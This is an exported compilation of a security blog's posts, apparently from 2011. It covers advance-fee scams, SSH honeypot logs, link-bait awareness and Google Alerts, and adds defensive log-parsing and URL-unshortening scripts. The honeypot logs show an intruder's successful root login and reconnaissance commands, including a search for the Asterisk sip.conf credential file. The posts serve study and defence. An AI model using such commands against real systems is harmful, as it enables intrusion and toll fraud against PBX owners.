As part of my continuing To Catch a Scammer project, I've decided to begin analyzing various advance fee frauds. Covered in this post:

Lottery/Contest Scam
Money Laundering Scam
Inheritance Donation Scam

Lottery/Contest Scam

One of the most common advance fee fraud scams I have seen is the Lottery or Contest scam. In this scam, the recipient receives an email from a lottery, sweepstakes, or contest, congratulating the recipient on their winning. Common faked senders:

Major corporations such as CocaCola, Microsoft, Yahoo!, or Google
Foreign Country Government Agencies
Foreign News Corporations

Common winnings amounts:

Anywhere between $1,000,000 and $5,000,000 USD.

How it works:

1. Victim receives notification of winnings
2. Victim replies to scammer with requested personal information
3. Scammer replies with contact information for fake bank/agency to claim winnings
4. Victim contacts fake bank/agency to claim winnings
5. Fake bank/agency replies with delivery fees, transfer fees, etc. which are needed from victim prior to receiving winnings

Money Laundering Scam

Another common advance fee fraud scam method is the money laundering scam. In this scam, the victim receives an email from a person who has access to a secret account from which they cannot draw funds directly, but require the assistance of a third party to move the funds out of the country. For helping them do this, the victim is offered a percentage of the amount being transferred. Common faked senders:

Oil tycoon
Investment banker

Common award amount:

Usually 40-50 % of various monetary amounts, ranging from $10,000,000 to $50,000,000

How it works:

1. Victim receives notification of proposed arrangement
2. Victim replies to scammer with requested personal information
3. Scammer replies with contact information for fake bank to begin fund transfer
4. Victim contacts fake bank to begin transfer
5. Fake bank replies with minimum deposit for new account, delivery fees, transfer fees, etc. which are needed from victim prior to receiving funds
6. Victim may also be requested to provide funds for bribes, legal fees, etc.

Inheritance Donation Scam

Similar to the money laundering scam, another common advance fee fraud method is the inheritance donation scam. In this scam, the victim receives an email from a dying person who has no heirs to pass their inheritance on to, and wishes to donate their inheritance to charity. For helping them do this, the victim is offered a percentage of the amount being transferred. Common faked senders:

Widow of a rich oil tycoon Widow of a rich investment banker Common award amount: 30
c 2013 caeinesecurity.blogspot.com

1.3. November

BlogBook

Anywhere from 10 to 40 % of various monetary amounts, ranging from $10,000,000 to $50,000,000 How it works:

1. Victim receives notication of proposed arrangement 2. Victim replies to scammer with requested personal information 3. Scammer replies with contact information for fake bank to begin fund transfer 4. Victim contacts fake bank to begin transfer 5. Fake bank replies with minimum deposit for new account, delivery fees, transfer fees, etc. which are needed from victim prior to receiving funds

1.2.7 BUSTED! (2011-10-17 18:22)

The password cracker script kiddies can't resist my picnic basket... Today an attacker with an SSH brute force script accidentally showed his hand by connecting to my honeypot from his [1]own system shortly after stopping his scan from his [2]compromised system. Unlike my previous, um, visitor, this attacker seems to have very few tricks up his sleeve. He attempted to upload something to my honeypot through SFTP. Unsuccessful, he abandoned his attempts. Today's guest is from Romania, and seems to prefer to scan using compromised systems in Germany to prevent his own IP from being immediately reported for conducting port scans. Much like other attackers, he shows that he is using his Windows system through the client version string PuTTY-Release-0.53b, and it was the same client banner appearing from both addresses that tied the two together. A notification email has been sent to both ISPs to report the attacker, as well as his compromised system being used for scanning. Original Log: [3]Kippo-Mon 10172011.log
1. http://network-tools.com/default.asp?prog=express&host=79.112.215.36
2. http://network-tools.com/default.asp?prog=express&host=85.131.247.53
3. https://docs.google.com/leaf?id=0B1ZA4ubLZ4YKODNjOWI4NTgtN2IwNC00YzEyLWEyYTYtYmRlYTFmNjI2NmJh&hl=en_US

1.3 November

1.3.1 The Lottery Scam - Jeani's Story (2011-11-07 22:33)

Advance fee fraud scams don't always come through email. This is a true story from a friend. During the holiday season in 2008, Jeani received notification that she had won a lottery in Russia. This notification came through postal mail, and included a $6,000 check. The scam offered Jeani $25,000 in exchange for her cashing the $6,000 check and returning the money via Western Union within 24 hours. Luckily Jeani suspected this was a scam. Continue on to read the rest of her story... From Jeani:

Before this happened I had never heard of a 419 scam or advance fee fraud. This opened my eyes up to the fraud world.

The scam was set up with a $6,000 check that we were to cash and then send them the money back, but the way they did it is they gave it a 24 hour limit for you to send the money back so that you wouldn't have time for your bank to make sure the check was good or bad. Then you would be out the money, because you would have sent them the $6,000 through Western Union, and then the check would come back bad and you would owe the money back to your bank. The scammer wanted the full $6,000 sent back to them, and once they got the money from you they would release $25,000 to you. I had a feeling it was a scam and did not send them anything. I was leery of this scam from the beginning and did not give them any information at all.

Jeani was contacted by law enforcement, and helped them locate the scammers based upon the phone numbers and addresses provided to her. She was one of the lucky ones. Lottery scams like this one have taken thousands from their victims, sometimes even resulting in their kidnapping and possible murder. When asked what advice to give others to help raise awareness, Jeani provided an excellent response:

Anything that seems too good to be true is. You should never have to pay any monies to claim any lottery, and if they are out of this country it is a scam.

[Editor's note: While most of these scams are based overseas in Russia and Nigeria, not all scams originate out of the country.] Jeani, thank you for sharing your story to help others be aware of these types of scams!

1.3.2 11/16/11 is American Internet Censorship Day (2011-11-16 18:46)

Reposted from SecLists.org: On 11/16 2011, Congress holds hearings on the first American Internet censorship system. This bill can pass. If it does, the Internet and free speech will never be the same. I'm afraid InfoSec News will be forced offline. If you are in the U.S., please visit the URL below and join the fight to stop SOPA! Join all of us on the 16th to stop this bill. [1]http://americancensorship.org/
1. http://americancensorship.org/

1.3.3 If ET were a Hacker, he would just try to phone home... (2011-11-17 18:03)

Up until now, all of the honeypot compromises I've logged have simply been attempts to propagate network scanning and IRC bots. Today's compromise was a little different. It started off with a regular SSH dictionary crack attempt which ultimately succeeded...

2011-11-16 23:54:51-0500 [kippo.core.honeypot.HoneyPotSSHFactory] New connection: 95.168.218.166:45132 (192.168.1.165:22) [session: 6]
2011-11-16 23:54:52-0500 [HoneyPotTransport,6,95.168.218.166] Remote SSH version: SSH-2.0-libssh-0.1
2011-11-16 23:54:52-0500 [HoneyPotTransport,6,95.168.218.166] kex alg, key alg: diffie-hellman-group1-sha1 ssh-rsa
2011-11-16 23:54:52-0500 [HoneyPotTransport,6,95.168.218.166] outgoing: aes256-cbc hmac-sha1 none
2011-11-16 23:54:52-0500 [HoneyPotTransport,6,95.168.218.166] incoming: aes256-cbc hmac-sha1 none
2011-11-16 23:54:52-0500 [HoneyPotTransport,6,95.168.218.166] NEW KEYS
2011-11-16 23:54:53-0500 [HoneyPotTransport,6,95.168.218.166] starting service ssh-userauth
2011-11-16 23:54:53-0500 [SSHService ssh-userauth on HoneyPotTransport,6,95.168.218.166] root trying auth password
2011-11-16 23:54:53-0500 [SSHService ssh-userauth on HoneyPotTransport,6,95.168.218.166] login attempt [root/r00tb33r] succeeded
2011-11-16 23:54:53-0500 [SSHService ssh-userauth on HoneyPotTransport,6,95.168.218.166] root authenticated with password
2011-11-16 23:54:53-0500 [SSHService ssh-userauth on HoneyPotTransport,6,95.168.218.166] starting service ssh-connection
2011-11-16 23:54:53-0500 [SSHService ssh-connection on HoneyPotTransport,6,95.168.218.166] got channel session request
2011-11-16 23:54:53-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,6,95.168.218.166] channel open
2011-11-16 23:54:53-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,6,95.168.218.166] pty request: xterm (24, 80, 0, 0)
2011-11-16 23:54:53-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,6,95.168.218.166] Terminal size: 24 80
2011-11-16 23:54:53-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,6,95.168.218.166] getting shell
2011-11-16 23:54:53-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,6,95.168.218.166] Opening TTY log: log/tty/20111116-235453-7554.log
2011-11-16 23:54:54-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,6,95.168.218.166] /etc/motd resolved into /etc/motd
2011-11-16 23:54:54-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,6,95.168.218.166] /var/run/motd resolved into /var/run/motd

Then the attacker proceeded to log in from his/her Windows system several hours later, and gather some basic info...

2011-11-17 05:32:25-0500 [kippo.core.honeypot.HoneyPotSSHFactory] New connection: 203.97.206.63:18085 (192.168.1.165:22) [session: 23]
2011-11-17 05:32:25-0500 [HoneyPotTransport,23,203.97.206.63] Remote SSH version: SSH-2.0-PuTTY_Release_0.61
2011-11-17 05:32:25-0500 [HoneyPotTransport,23,203.97.206.63] kex alg, key alg: diffie-hellman-group1-sha1 ssh-rsa
2011-11-17 05:32:25-0500 [HoneyPotTransport,23,203.97.206.63] outgoing: aes256-ctr hmac-sha1 none
2011-11-17 05:32:25-0500 [HoneyPotTransport,23,203.97.206.63] incoming: aes256-ctr hmac-sha1 none
2011-11-17 05:32:28-0500 [HoneyPotTransport,23,203.97.206.63] NEW KEYS
2011-11-17 05:32:28-0500 [HoneyPotTransport,23,203.97.206.63] starting service ssh-userauth
2011-11-17 05:32:41-0500 [SSHService ssh-userauth on HoneyPotTransport,23,203.97.206.63] root trying auth none
2011-11-17 05:32:41-0500 [SSHService ssh-userauth on HoneyPotTransport,23,203.97.206.63] root trying auth keyboard-interactive
2011-11-17 05:32:50-0500 [SSHService ssh-userauth on HoneyPotTransport,23,203.97.206.63] login attempt [root/r00tb33r] succeeded
2011-11-17 05:32:50-0500 [SSHService ssh-userauth on HoneyPotTransport,23,203.97.206.63] root authenticated with keyboard-interactive
2011-11-17 05:32:50-0500 [SSHService ssh-userauth on HoneyPotTransport,23,203.97.206.63] starting service ssh-connection
2011-11-17 05:32:50-0500 [SSHService ssh-connection on HoneyPotTransport,23,203.97.206.63] got channel session request
2011-11-17 05:32:50-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,23,203.97.206.63] channel open
2011-11-17 05:32:50-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,23,203.97.206.63] pty request: xterm (24, 80, 0, 0)
2011-11-17 05:32:50-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,23,203.97.206.63] Terminal size: 24 80
2011-11-17 05:32:51-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,23,203.97.206.63] getting shell
2011-11-17 05:32:51-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,23,203.97.206.63] Opening TTY log: log/tty/20111117-053251-4322.log
2011-11-17 05:32:51-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,23,203.97.206.63] /etc/motd resolved into /etc/motd
2011-11-17 05:32:51-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,23,203.97.206.63] /var/run/motd resolved into /var/run/motd
2011-11-17 05:32:57-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,23,203.97.206.63] CMD: w
2011-11-17 05:32:57-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,23,203.97.206.63] Command found: w
2011-11-17 05:33:12-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,23,203.97.206.63] CMD: cat /proc cpuinfo
2011-11-17 05:33:12-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,23,203.97.206.63] Command found: cat /proc cpuinfo
2011-11-17 05:33:12-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,23,203.97.206.63] /root/cpuinfo resolved into /root/cpuinfo
2011-11-17 05:33:19-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,23,203.97.206.63] CMD: cat /proc/cpuinfo
2011-11-17 05:33:19-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,23,203.97.206.63] Command found: cat /proc/cpuinfo
2011-11-17 05:33:19-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,23,203.97.206.63] /proc/cpuinfo resolved into /proc/cpuinfo
2011-11-17 05:33:19-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,23,203.97.206.63] Updating realfile to honeyfs//proc/cpuinfo

This is when things started to turn interesting. The rest of the commands used by the attacker seemed to have one specific purpose...

2011-11-17 05:33:41-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,23,203.97.206.63] CMD: cd /etc/asterisk
2011-11-17 05:33:41-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,23,203.97.206.63] Command found: cd /etc/asterisk
2011-11-17 05:33:46-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,23,203.97.206.63] CMD: locate
2011-11-17 05:33:46-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,23,203.97.206.63] Command not found: locate
2011-11-17 05:33:49-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,23,203.97.206.63] CMD: yum
2011-11-17 05:33:49-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,23,203.97.206.63] Command not found: yum
2011-11-17 05:33:53-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,23,203.97.206.63] CMD: apt-get
2011-11-17 05:33:53-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,23,203.97.206.63] Command found: apt-get
2011-11-17 05:34:09-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,23,203.97.206.63] CMD: find /|grep sip.conf
2011-11-17 05:34:09-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,23,203.97.206.63] Command not found: find /|grep sip.conf
2011-11-17 05:34:25-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,23,203.97.206.63] CMD: exit
2011-11-17 05:34:25-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,23,203.97.206.63] Command found: exit
2011-11-17 05:34:25-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,23,203.97.206.63] sending close 0
2011-11-17 05:34:25-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,23,203.97.206.63] remote close
2011-11-17 05:34:25-0500 [HoneyPotTransport,23,203.97.206.63] connection lost

The attacker was looking for an Asterisk server. This is rather interesting, since the number of attacks against [1]Asterisk (open source VoIP/PBX software) has been increasing recently, per the [2]SANS Internet Storm Center. Is it possible this relates to the recent [3]User Enumeration Weakness which was [4]patched in June 2011? Why are attackers targeting Asterisk? Are they simply trying to phone home for free? The "find /|grep sip.conf" attempt points that way: sip.conf holds the SIP peer names and secrets, so a copy of it is exactly what an intruder needs to register against the PBX and route calls through it at the owner's expense. The originator of this attack is 203.97.206.63, a customer of the New Zealand broadband provider TelstraClear. The ISP has been notified.
1. http://www.asterisk.org/
2. http://isc.sans.edu/port.html?port=5060
3. http://www.securityfocus.com/bid/48485/info
4. http://downloads.asterisk.org/pub/security/AST-2011-011.html
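Both this post and the earlier "BUSTED!" post rely on reading kippo logs by eye: the first to notice one client banner arriving from two different addresses, the second to notice commands that only make sense against a PBX. The script below is an added example, not code from the original posts or from kippo itself. It parses the kippo text format quoted above into one record per session, reports any client banner that was presented from more than one source IP, and flags sessions whose commands mention Asterisk or sip.conf. The SAMPLE_LOG lines are constructed in that format with RFC 5737 documentation addresses; they are not the original captures.

```python
"""Kippo honeypot log triage: client-banner correlation and VoIP hunting.

Added example, not code from the original posts or from kippo. Parses the
kippo text log format into per-session records, then (a) lists banners seen
from more than one source IP and (b) flags sessions hunting for a PBX.
SAMPLE_LOG is constructed; its addresses are documentation addresses.
"""
import re
from collections import defaultdict

# kippo line shape: "<date> <time+offset> [<context>] <message>"
LINE_RE = re.compile(r"^(?P<ts>\S+ \S+) \[(?P<ctx>[^\]]+)\] (?P<msg>.*)$")
NEW_CONN_RE = re.compile(r"New connection: (?P<ip>[\d.]+):\d+ .*\[session: (?P<sid>\d+)\]")
CTX_RE = re.compile(r"HoneyPotTransport,(?P<sid>\d+),(?P<ip>[\d.]+)")
VERSION_RE = re.compile(r"Remote SSH version: (?P<banner>\S+)")
LOGIN_OK_RE = re.compile(r"login attempt \[(?P<user>[^/]+)/(?P<pw>[^\]]*)\] succeeded")
CMD_RE = re.compile(r"^CMD: (?P<cmd>.*)$")

# Substrings that only make sense when the intruder is after a PBX.
VOIP_MARKERS = ("asterisk", "sip.conf")

SAMPLE_LOG = [  # constructed; same shape as the kippo excerpts in the post
    "2011-11-16 23:54:51-0500 [kippo.core.honeypot.HoneyPotSSHFactory] New connection: 198.51.100.7:45132 (192.168.1.165:22) [session: 6]",
    "2011-11-16 23:54:52-0500 [HoneyPotTransport,6,198.51.100.7] Remote SSH version: SSH-2.0-libssh-0.1",
    "2011-11-16 23:54:53-0500 [SSHService ssh-userauth on HoneyPotTransport,6,198.51.100.7] login attempt [root/r00tb33r] succeeded",
    "2011-11-16 23:58:10-0500 [kippo.core.honeypot.HoneyPotSSHFactory] New connection: 198.51.100.7:45200 (192.168.1.165:22) [session: 7]",
    "2011-11-16 23:58:11-0500 [HoneyPotTransport,7,198.51.100.7] Remote SSH version: SSH-2.0-PuTTY-Release-0.53b",
    "2011-11-16 23:58:15-0500 [SSHService ssh-userauth on HoneyPotTransport,7,198.51.100.7] login attempt [root/r00tb33r] succeeded",
    "2011-11-16 23:58:20-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,7,198.51.100.7] CMD: w",
    "2011-11-17 05:32:25-0500 [kippo.core.honeypot.HoneyPotSSHFactory] New connection: 192.0.2.10:18085 (192.168.1.165:22) [session: 23]",
    "2011-11-17 05:32:25-0500 [HoneyPotTransport,23,192.0.2.10] Remote SSH version: SSH-2.0-PuTTY-Release-0.53b",
    "2011-11-17 05:32:50-0500 [SSHService ssh-userauth on HoneyPotTransport,23,192.0.2.10] login attempt [root/r00tb33r] succeeded",
    "2011-11-17 05:32:57-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,23,192.0.2.10] CMD: w",
    "2011-11-17 05:33:41-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,23,192.0.2.10] CMD: cd /etc/asterisk",
    "2011-11-17 05:34:09-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,23,192.0.2.10] CMD: find /|grep sip.conf",
    "2011-11-17 05:34:25-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,23,192.0.2.10] CMD: exit",
]


def parse_kippo(lines):
    """Return {session_id: {"ip", "banner", "creds", "commands"}} from kippo log lines."""
    sessions = defaultdict(lambda: {"ip": None, "banner": None, "creds": None, "commands": []})
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # not a kippo line; ignore
        ctx, msg = m.group("ctx"), m.group("msg")
        nc = NEW_CONN_RE.search(msg)
        if nc:  # the factory line is where the session id and peer first appear
            sessions[nc.group("sid")]["ip"] = nc.group("ip")
            continue
        cm = CTX_RE.search(ctx)  # every later line names the transport it belongs to
        if not cm:
            continue
        rec = sessions[cm.group("sid")]
        rec["ip"] = rec["ip"] or cm.group("ip")
        v = VERSION_RE.search(msg)
        if v:
            rec["banner"] = v.group("banner")
        lo = LOGIN_OK_RE.search(msg)
        if lo:
            rec["creds"] = (lo.group("user"), lo.group("pw"))
        c = CMD_RE.match(msg)
        if c:
            rec["commands"].append(c.group("cmd"))
    return dict(sessions)


def banners_by_ip(sessions):
    """Map each client banner to the sorted list of source IPs that presented it."""
    seen = defaultdict(set)
    for rec in sessions.values():
        if rec["banner"] and rec["ip"]:
            seen[rec["banner"]].add(rec["ip"])
    return {b: sorted(ips) for b, ips in seen.items()}


def shared_banners(sessions):
    """Banners presented from more than one source IP: one client, several hosts."""
    return {b: ips for b, ips in banners_by_ip(sessions).items() if len(ips) > 1}


def voip_sessions(sessions):
    """Session ids whose commands reference Asterisk or SIP configuration."""
    hits = [sid for sid, rec in sessions.items()
            if any(mk in cmd.lower() for cmd in rec["commands"] for mk in VOIP_MARKERS)]
    return sorted(hits, key=int)


if __name__ == "__main__":
    parsed = parse_kippo(SAMPLE_LOG)
    for sid, rec in sorted(parsed.items(), key=lambda kv: int(kv[0])):
        print(sid, rec["ip"], rec["banner"], rec["creds"], rec["commands"])
    print("banner seen from several IPs:", shared_banners(parsed))
    print("sessions hunting for a PBX:", voip_sessions(parsed))
```

Run against a real kippo.log by passing `open("log/kippo.log")` to parse_kippo. A banner shared across addresses is a weak signal on its own (PuTTY is common), so treat it as a lead to check against timing, the credentials used, and the command history, as the original post did.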

1.3.4 Protecting electronic devices from an EMP attack (2011-11-21 07:26)

Today one of my articles has been featured as a guest post at ModernSurvivalOnline. The topic of the article is Protecting electronic devices from an EMP attack, a very informative how-to guide. Please visit [1]ModernSurvivalOnline.com to read the article. Thanks!
1. http://modernsurvivalonline.com/guest-post-protecting-electronic-devices-from-an-emp-attack/

1.4 December

1.4.1 See who's trying to hack your Facebook profile! (2011-12-01 20:20)

Many links claim to let you see who's stalking you on Facebook. This link claims to let you see who's trying to HACK your Facebook profile! [1]http://bit.ly/vXjiBw

Were you brought to this blog post by a shortened link on Facebook? Why did you click that? Haven't we learned yet not to click on strange links? After all these years, users are STILL being infected with malware and helping to propagate it by [2]clicking on links they shouldn't. (And yes, that link is safe.) URL shorteners such as bit.ly can very conveniently be used to hide malicious links. Here's a little trick to help keep you safer. There are URL unshorteners such as [3]UnFwd4Me and [4]Unshorten.com which will reveal the true address of a shortened URL before you visit it. So, now that your security awareness has been raised, please share this link with others by copying the text below, and help them raise their security awareness as well! To be more effective, please turn the URL preview OFF. See who's trying to hack your Facebook profile! http://bit.ly/vXjiBw

[5] Related Reading: [6]The (VERY) Unofficial Guide to Facebook Privacy

1. http://bit.ly/vXjiBw
2. http://facecrooks.com/Safety-Center/Scam-Watch/WOAH-my-profile-was-viewed-128-times-JUST-TODAY-and-I-can-see-that-I-have-quite-a-few-stalkers-LOL-Find-out-yours-here.html
3. http://unfwd4.me/
4. http://www.unshorten.com/
5. http://4.bp.blogspot.com/-bJD_GpJHB6g/TtgpTXDKqxI/AAAAAAAAAHE/yaqCqiO_Z6w/s1600/facebook.png
6. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=oc&_t=oc:&pc=w_make16
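The unshortening services above do one thing: follow the redirect chain without loading the final page. The script below is an added example, not code from the original post or from either service, showing how to do that yourself with HEAD requests and automatic redirect following switched off, so the destination is revealed but never fetched or rendered. It also caps the number of hops and stops on the first repeated URL, since a hostile chain can loop. The fetch function is injectable: the default uses urllib, and FAKE_RESPONSES is a constructed table of placeholder hosts so the example runs offline.

```python
"""Resolve a shortened URL without ever rendering the page it hides.

Added example, not from the original post. The redirect chain is walked one
hop at a time with HEAD requests and automatic redirect following disabled;
a hop limit and loop check keep a hostile chain from spinning forever.
FAKE_RESPONSES is constructed (placeholder hosts) for offline use.
"""
from urllib.error import HTTPError
from urllib.parse import urljoin
from urllib.request import HTTPRedirectHandler, Request, build_opener

REDIRECT_CODES = (301, 302, 303, 307, 308)


class _NoRedirect(HTTPRedirectHandler):
    """Returning None makes urllib raise the 3xx as HTTPError instead of following it."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def default_fetch_head(url, timeout=10):
    """HEAD one URL; return (status, Location header or None). Never follows redirects."""
    opener = build_opener(_NoRedirect())
    try:
        with opener.open(Request(url, method="HEAD"), timeout=timeout) as resp:
            return resp.getcode(), resp.headers.get("Location")
    except HTTPError as err:  # 3xx (and 4xx/5xx) arrive here with headers intact
        return err.code, err.headers.get("Location")


def unshorten(url, fetch_head=default_fetch_head, max_hops=10):
    """Return the URLs visited, starting with `url`; the last entry is the destination.

    Stops at a non-redirect status, a redirect without Location, the hop
    limit, or the first revisit of a URL (a redirect loop).
    """
    chain = [url]
    for _ in range(max_hops):
        status, location = fetch_head(chain[-1])
        if status not in REDIRECT_CODES or not location:
            break
        nxt = urljoin(chain[-1], location)  # Location may be relative
        chain.append(nxt)
        if chain.count(nxt) > 1:  # loop detected: report it and stop
            break
    return chain


def final_destination(url, **kw):
    """Just the last hop, for a one-line 'where does this really go?' answer."""
    return unshorten(url, **kw)[-1]


# Constructed responses for an offline run; the hosts are placeholders.
FAKE_RESPONSES = {
    "http://short.example/abc": (301, "http://t.example/go"),
    "http://t.example/go": (302, "/landing"),
    "http://t.example/landing": (200, None),
    "http://a.example/1": (302, "http://a.example/2"),
    "http://a.example/2": (302, "http://a.example/1"),
}


def fake_fetch_head(url):
    """Stand-in for default_fetch_head that never touches the network."""
    return FAKE_RESPONSES.get(url, (404, None))


if __name__ == "__main__":
    print(" -> ".join(unshorten("http://short.example/abc", fetch_head=fake_fetch_head)))
    print(" -> ".join(unshorten("http://a.example/1", fetch_head=fake_fetch_head)))
```

With the default fetcher, `final_destination("http://bit.ly/...")` resolves a live link. A HEAD request still tells the shortener's operator that someone resolved the link, so this is a check on where a link goes, not an anonymity measure.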

1.4.2 Free IT Security Magazines and Whitepapers from TradePub (2011-12-05 17:51)

Caffeine Security has joined forces with TradePub.com to offer you a new, exciting, and entirely free professional resource. Visit [1]http://caffinesecurity-blogspot.tradepub.com today to browse our selection of complimentary industry magazines, white papers, webinars, podcasts, and more across 34 industry sectors. No credit cards, coupons, or promo codes required. [2]Try it today! We are pleased to offer you this exciting, new, and entirely free professional resource. Visit our [3]Free Industry resource center today to browse our selection of 600+ complimentary industry magazines, white papers, webinars, podcasts, and more. Get popular titles including: [4]It's Time to Think Differently About Access and Data Center Networks! [5]Cloud First IT: Managing a Growing Network of SaaS Applications [6]Busting the Myth of Email Encryption Complexity. No credit cards, coupons, or promo codes required. [7]Try it today!

1. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl/?sr=ps&_t=ps:w_paraB:&ch=&_m=01.00ev.1.0.0
2. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl/?sr=ps&_t=ps:w_paraB:&ch=&_m=01.00ev.1.0.0&ct=Infosec&flt=all
3. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl/?sr=ps&_t=ps:w_paraC:&ch=&_m=01.00ev.1.0.0&ct=Infosec&flt=all
4. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl/?sr=ps&_t=ps:w_paraC:&ch=&pc=w_arub01&_m=01.00ev.1.0.0
5. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl/?sr=ps&_t=ps:w_paraC:&ch=&pc=w_okta04&_m=01.00ev.1.0.0
6. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl/?sr=ps&_t=ps:w_paraC:&ch=&pc=w_sym105&_m=01.00ev.1.0.0
7. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl/?sr=ps&_t=ps:w_paraC:&ch=&_m=01.00ev.1.0.0&ct=Infosec&flt=all

1.4.3 Misuse of Your Personal Information and Google Alerts (2011-12-08 19:49)

It's always a good idea to keep tabs on your online presence. This can help prevent embarrassing situations, such as an ex-girlfriend posting all your dirty laundry for the world to see, or keep someone from stealing your identity, or from using your name or address for fraudulent activities, resulting in the police knocking on YOUR door instead of theirs. Here is an excellent example... One of my former co-workers had a rather interesting event happen to him after moving into his new house... Someone was running a women's retreat business from his home address! He found this out by randomly searching for his own home address using Google. Apparently someone had set up an entire website for this fake business using the real estate listing information for his home from before he purchased it. Luckily, this site did not remain online for long, but things could have become really interesting if someone had shown up with suitcases in hand expecting to spend a weekend at the retreat they had already paid for in full...

A few other situations which could happen:
- Someone decides to try to rent or sell your house without your knowledge
- Someone posts your address for an "everything for free" event on Craigslist as a cover for looting your house
- A former co-worker or client posts your personal information on an online bulletin board accusing you of something bad, resulting in harassing phone calls from thousands of complete strangers
- An online group such as Anonymous posts your name and address on bulletin boards to coordinate a prank SWAT raid
- Your college or university accidentally publishes a list of student names and social security numbers

The above are very real situations which have occurred, and could possibly have been avoided (or at least given some warning) if only the victim had regularly checked the internet for their personal information. So how can you protect yourself from these situations? One way is to set up Google Alerts to monitor your online presence.

It's really easy to do. All you need is a Google account; then visit [1]http://www.google.com/alerts. If you use a different provider for your email, just use [2]Gmail Forwarding. Set up alerts to be emailed to you on a daily or weekly basis, using the following settings:
- Search Query: <insert information here>
- Result Type: Everything
- How Often: As-it-happens, daily, or weekly, depending on how many alerts you want to receive
- How Many: If you expect a lot of results (for example, your name is Bill Gates), go with "Only the best results". Otherwise, go with "All results".
- Deliver To: Your Gmail address

Below is an example screenshot. Note I have Deliver To set to Feed to hide my email address...

[3]

So what information should you monitor? A few suggestions:
- Full name
- Full name with maiden name, if applicable
- Home address
- Home phone number
- Cell number
- Personal web site
- Email address
- ...any other personally identifying information

If you'd like, use [4]advanced Google search techniques to construct queries such as:

"My Name" -"My Employer"

The quotes keep each part together as a phrase; the above query will hide any results for your name where your employer's name is on the same page. This could be useful if your name is Bill Gates and you're employed by Microsoft, and you are not concerned about news articles which involve your company, but are concerned about people posting other personal information. Also consider monitoring your children's, spouse's, and parents'/grandparents' names and contact information.

Two items you should NEVER EVER monitor through a Google alert are your credit card number and social security number. Why? The query itself hands the number to a third party every time the alert runs, and if your Google or email account ever gets compromised, the attacker will have instant access to that information!
1. http://www.google.com/alerts 2. http://support.google.com/mail/bin/answer.py?hl=en&answer=10957 3. http://4.bp.blogspot.com/-1TBHKf5M6rc/TuFVd-vsPRI/AAAAAAAAAHM/hmTuUZe_snA/s1600/googlealert.jpg 4. http://support.google.com/websearch/bin/answer.py?hl=en&answer=136861

1.4.4 The (VERY) Unofficial Guide To Facebook Privacy (2011-12-11 11:35)

To fully understand the privacy of Facebook and how it's likely to evolve, you need to understand one thing... Facebook executives want everyone to be public.

[1] As the service evolves, executives tend to favor open access to information, meaning information you think is private will slowly become public. But that doesn't mean you can't be private if you want to. Facebook gives its users the option to lock things down, but users need to be aware of their controls, how to use them, and how to prepare for future Facebook privacy changes. Facebook has not and will not make this information obvious, and that's where this guide comes in. [2]Get your copy today! And please share this link with your friends and family, so they can better protect their privacy as well!
1. http://3.bp.blogspot.com/-SM4w1qGMnqY/TuTbEuw69gI/AAAAAAAAAHU/IV7MSFoM3Sg/s1600/w_make16c.gif 2. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=oc&_t=oc:&pc=w_make16

